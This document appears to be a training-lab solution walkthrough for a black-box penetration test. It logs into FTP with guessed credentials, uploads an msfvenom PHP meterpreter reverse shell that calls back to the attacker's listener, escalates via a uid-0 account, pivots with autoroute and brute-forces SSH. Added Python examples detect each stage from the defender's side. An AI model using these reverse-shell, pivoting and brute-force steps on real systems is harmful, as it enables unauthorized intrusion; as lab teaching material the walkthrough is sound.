Black-box 3
You have been engaged in a Black-box Penetration Test (172.16.37.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag.
Some machines are exploitable instantly, but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information that will help you proceed further into the environment.
If you are stuck on one of the machines, don't overthink and start pentesting another one.
When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.
This is not a CTF! The flags' purpose is to help you identify if you fully compromised a machine or not.
The solutions contain the shortest path to compromise each machine. You should follow the penetration testing process covered in its entirety!
Goals
Discover and exploit all machines on the network
Read all flag files (one per machine)
Obtain root privileges on both machines (meterpreter's autoroute functionality and ncrack's minimal.usr list will prove useful)
What you will learn
Network discovery
Pivoting to other networks
Basic privilege escalation
Recommended tools
Dirb
Metasploit framework (recommended version 5)
Nmap
FTP Utility
Solutions
Below, you can find solutions for the engagement. Remember though that you can follow your own strategy (which may be different from the one explained below).
Step 1: CONNECT TO THE VPN
Connect to the lab environment using the provided VPN file.
Make sure you received an IP address within the 10.13.37.0/24 range.
Don't worry about the fact that you got an IP within the 10.13.37.0/24 range. The 172.16.37.0/24 range is accessible through a static route.
Step 2: DISCOVER LIVE HOSTS ON THE NETWORK
Using nmap, scan for live hosts on the 172.16.37.0/24 network.
Sort the discovered addresses (exclude your own IP address) and write the rest to a file. This file will be fed to nmap in order to perform a full TCP scan.
Use nmap with the following options:
-sV for version identification
-n to disable reverse DNS lookups
-v for verbose output
-Pn to skip host discovery and treat every host as alive
-p- to scan all 65535 TCP ports
-T4 to speed things up
-iL to use a list of IPs as input (ips.txt)
--open to show only open ports, not closed / filtered ones
-A for OS detection, version detection, script scanning and traceroute
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
You will come across something similar to the below.
Nmap scan report for 172.16.37.220
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Nmap scan report for 172.16.37.234
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
40121/tcp open ftp ProFTPD 1.3.0a
40180/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Step 3: INSPECT BOTH HTTP SERVICES
Using dirb against http://172.16.37.234:40180 will result in the http://172.16.37.234:40180/xyz/ directory being discovered. This directory contains the following.
In addition, if we inspect the http://172.16.37.220 page's source code, we will come across the below.
Both the above inform us that there is another network that we are not yet capable of accessing. In order to get into it, we need to compromise one of the machines.
Step 4: INSPECT THE FTP SERVICE ON THE 172.16.37.234 MACHINE
The FTP service on port 40121 has a promising banner. Let's try to log into it using the identified ftpuser username and a password that is the same as the identified username (ftpuser).
ftp 172.16.37.234 40121
Luckily, we identified valid credentials and we are now able to explore the FTP environment.
By issuing basic commands we can identify that the FTP service allows the uploading of files into the webroot. This is a solid attack vector for remote code execution.
Now, we should focus on creating a suitable reverse shell.
Step 5: MAKE THE APPROPRIATE PREPARATIONS TO ESTABLISH A REVERSE SHELL
A suitable payload for an Apache server is a PHP-based one. Let's generate such a payload using msfvenom, as follows.
msfvenom -p php/meterpreter_reverse_tcp lhost=10.13.37.4 lport=53 -o meterpreter.php
lhost is your tap0 IP address
lport is the port you would like to listen on. It is recommended that you choose a commonly used port to get around egress firewall restrictions, instead of an exotic or "funny" port like 31337 or the very common 4444.
-o specifies the output file
Note that this meterpreter-based file should be placed inside the directory from which you run the FTP client. For example, if your meterpreter.php file is on the Desktop, then before connecting to the FTP service make sure that your current working directory is also the Desktop.
Before trying to establish a meterpreter session, we should set a Metasploit listener up, as follows.
use exploit/multi/handler
set lhost 10.13.37.4
set payload php/meterpreter_reverse_tcp
set lport 53
run
Step 6: UPLOAD THE METERPRETER-BASED FILE AND OBTAIN A REMOTE ROOT SHELL
Let's go back to the FTP connection. If it has timed out, reconnect by exiting the FTP client and connecting again.
Upload the meterpreter-based file using the "put" command (do not confuse it with the HTTP PUT verb), as follows. Note the cd html command, which ensures you are uploading directly into the webroot.
ftp 172.16.37.234 40121
ftpuser
ftpuser
cd html
put meterpreter.php
When the upload is complete, visit the meterpreter-based file through the browser and observe your newly-created meterpreter session being opened. Note that the page will keep on loading and eventually display a timeout, but this is perfectly okay since all we care about is the server executing our reverse shell payload.
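From the defender's side, as an added example that is not part of the lab solution: the upload-then-browse sequence above leaves a trace in the FTP transfer log and in the web server's access log. The script below flags script-file uploads into the webroot and correlates them with the first HTTP request that executes them; it assumes ProFTPD's default wu-ftpd style TransferLog format, Apache's combined log format and a webroot of /var/www/html, and the log lines are constructed.

```python
# Added example, not part of the lab write-up: flag FTP uploads of server-side
# script files into the webroot (ProFTPD wu-ftpd style TransferLog) and
# correlate them with the first HTTP request that executes them.
import re
from typing import Dict, List

WEBROOT = "/var/www/html"                       # assumed webroot
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")

# Constructed sample logs mirroring the upload-then-browse sequence.
XFERLOG = """Wed Jan 10 12:34:56 2024 1 10.13.37.4 1117 /var/www/html/meterpreter.php b _ i r ftpuser ftp 0 * c
Wed Jan 10 12:36:02 2024 1 10.13.37.4 2048 /var/www/html/notes.txt a _ i r ftpuser ftp 0 * c
Wed Jan 10 12:37:15 2024 1 10.13.37.4 512 /var/www/html/index.html a _ o r ftpuser ftp 0 * c
"""
ACCESS_LOG = """10.13.37.4 - - [10/Jan/2024:12:35:10 +0000] "GET /meterpreter.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.13.37.4 - - [10/Jan/2024:12:36:40 +0000] "GET /notes.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+)')

def script_uploads(xferlog: str) -> List[Dict[str, str]]:
    """Inbound (direction 'i'), completed ('c') transfers of script files under WEBROOT."""
    found = []
    for line in xferlog.splitlines():
        f = line.split()
        if len(f) != 18:              # filenames containing spaces are not handled
            continue
        path, direction, status, user, src = f[8], f[11], f[17], f[13], f[6]
        if (direction == "i" and status == "c"
                and path.startswith(WEBROOT + "/")
                and path.lower().endswith(SCRIPT_EXT)):
            found.append({"path": path, "user": user, "src": src,
                          "time": " ".join(f[0:5])})
    return found

def first_execution(uploads: List[Dict[str, str]], access_log: str) -> Dict[str, str]:
    """Map each uploaded script path to the first client that requested it over HTTP."""
    by_uri = {u["path"][len(WEBROOT):]: u["path"] for u in uploads}
    hits: Dict[str, str] = {}
    for line in access_log.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        client, when, uri = m.groups()
        uri = uri.split("?", 1)[0]        # ignore any query string
        if uri in by_uri and by_uri[uri] not in hits:
            hits[by_uri[uri]] = f"{client} at {when}"
    return hits

if __name__ == "__main__":
    ups = script_uploads(XFERLOG)
    for path, who in first_execution(ups, ACCESS_LOG).items():
        print(f"script {path} uploaded over FTP and first requested by {who}")
```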
Using the "shell" command, we are presented with a remote terminal. Then, issue the below for a friendlier terminal prompt.
shell
bash -i
By viewing /etc/passwd you notice that ftpuser is, in fact, a privileged system user (uid 0, effectively root).
So the logical thing is to execute the below, to escalate your privileges.
su ftpuser
Enter the password "ftpuser", just like you did when logging into FTP.
This might fail due to the lack of a terminal (su must be run from a tty).
In order to spawn a terminal we can use Python, as follows.
python -c 'import pty;pty.spawn("/bin/bash")'
If we look into the /var/www directory, we'll find the flag there.
Note that you need root-level privileges to read it.
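A defender's counterpart to this finding, as an added example that is not part of the lab solution: a small audit of /etc/passwd for accounts that share uid 0 with root, which is exactly the misconfiguration that turns the ftpuser password into a root password here. The passwd content is constructed to mirror that situation.

```python
# Added example (not part of the lab write-up): audit an /etc/passwd-style
# file for accounts that share uid 0 with root, as ftpuser does on this box.
# The passwd content below is constructed to mirror the situation described.
from typing import List, Tuple

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ftpuser:x:0:0:ftp user:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""

NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")

def find_uid0_accounts(passwd_text: str) -> List[Tuple[str, str, str]]:
    """Return (name, home, shell) for every non-root account with uid 0.

    Each passwd line has seven colon-separated fields:
    name:password:uid:gid:gecos:home:shell. Malformed lines are skipped.
    """
    hits = []
    for raw in passwd_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, _gid, _gecos, home, shell = fields
        if uid == "0" and name != "root":
            hits.append((name, home, shell))
    return hits

def interactive_uid0_accounts(passwd_text: str) -> List[str]:
    """Names of uid-0 aliases that also have a real login shell (the
    dangerous case: any password guess for them is a root password)."""
    return [name for name, _home, shell in find_uid0_accounts(passwd_text)
            if shell not in NOLOGIN_SHELLS]

if __name__ == "__main__":
    for name, home, shell in find_uid0_accounts(SAMPLE_PASSWD):
        print(f"uid 0 alias: {name} home={home} shell={shell}")
```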
Step 7: LEVERAGE THE COMPROMISED 172.16.37.234 MACHINE TO CREATE A ROUTE TO THE SECOND NETWORK AND COMPROMISE THE REMAINING 172.16.37.220 MACHINE
Issuing an "nmap" command when inside the 172.16.37.234 machine reveals that nmap is installed. Leverage it to scan the remaining machine using its second IP address (172.16.50.222, which was identified during the web application reconnaissance phase in Step 3).
An SSH service is running on 172.16.50.222. Background the shell by pressing ctrl + z. When the meterpreter > prompt appears, use meterpreter's autoroute functionality in order to access it. You can do this, as follows.
run autoroute -s 172.16.50.0/24
Step 8: BRUTEFORCE / GUESS SSH CREDENTIALS USING METASPLOIT'S SSH_LOGIN MODULE
Autoroute routes our exploitation attempts through the first compromised machine and enables us to reach the remaining machine through the second network (172.16.50.0/24). As seen above, having access to that network allowed us to identify and reach additional services running on the remaining machine.
Let's focus on the SSH one. We can now leverage Metasploit's ssh_login module to guess valid SSH credentials. We can do that as follows.
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 172.16.50.222
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true
run
After a short time, a new session will be opened in Metasploit.
You can switch to the newly opened session, as follows.
sessions -i 3
bash -i
Finally, if you navigate to the home directory (/root), you will come across the flag .flag.txt.
Note that you will see the flag in the directory contents only after executing ls with the "-la" parameters, since it is a hidden file.
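Seen from the target machine, the ssh_login run above is a burst of password failures followed by one success, all arriving from the pivot host's address on 172.16.50.0/24 rather than from the tester's VPN IP. As an added example that is not part of the lab solution, the detector below runs that logic over constructed OpenSSH auth.log lines (the pivot's 172.16.50.x address is a constructed value).

```python
# Added example, not part of the lab write-up: detect an SSH password-guessing
# burst in OpenSSH auth.log lines and flag a login that succeeds right after it.
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List

# Constructed sample. Because of the pivot, attempts arrive from the first
# compromised host's 172.16.50.x address (constructed), not the VPN client.
AUTH_LOG = """Jan 10 12:40:01 web sshd[1201]: Failed password for invalid user admin from 172.16.50.234 port 51234 ssh2
Jan 10 12:40:02 web sshd[1203]: Failed password for invalid user guest from 172.16.50.234 port 51236 ssh2
Jan 10 12:40:02 web sshd[1205]: Failed password for root from 172.16.50.234 port 51238 ssh2
Jan 10 12:40:03 web sshd[1207]: Failed password for invalid user test from 172.16.50.234 port 51240 ssh2
Jan 10 12:40:04 web sshd[1209]: Failed password for root from 172.16.50.234 port 51242 ssh2
Jan 10 12:40:05 web sshd[1211]: Accepted password for root from 172.16.50.234 port 51244 ssh2
Jan 10 12:55:00 web sshd[1300]: Failed password for alice from 172.16.50.10 port 40000 ssh2
Jan 10 12:55:30 web sshd[1302]: Accepted password for alice from 172.16.50.10 port 40002 ssh2
"""
LINE_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                     r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port")

def detect_ssh_bruteforce(log: str, threshold: int = 5, window_s: int = 60,
                          year: int = 2024) -> List[str]:
    """Return alert strings. A source reaching `threshold` failures within a
    sliding window of `window_s` seconds is reported once; an accepted login
    from a source already in burst state is reported as a probable compromise.
    Syslog lines carry no year, so one is supplied by the caller."""
    failures: Dict[str, Deque[float]] = defaultdict(deque)
    bursting: Dict[str, bool] = defaultdict(bool)
    alerts: List[str] = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        stamp, outcome, user, src = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S").timestamp()
        q = failures[src]
        while q and ts - q[0] > window_s:   # drop failures outside the window
            q.popleft()
        if outcome == "Failed":
            q.append(ts)
            if len(q) >= threshold and not bursting[src]:
                bursting[src] = True
                alerts.append(f"BRUTEFORCE {src}: {len(q)} failures within {window_s}s")
        elif bursting[src]:
            alerts.append(f"COMPROMISE {src}: accepted password for {user} after burst")
    return alerts

if __name__ == "__main__":
    print("\n".join(detect_ssh_bruteforce(AUTH_LOG)))
```

A single failed attempt followed by a success (alice in the sample) produces no alert, so the window and threshold, not the mere presence of a failure, drive the decision.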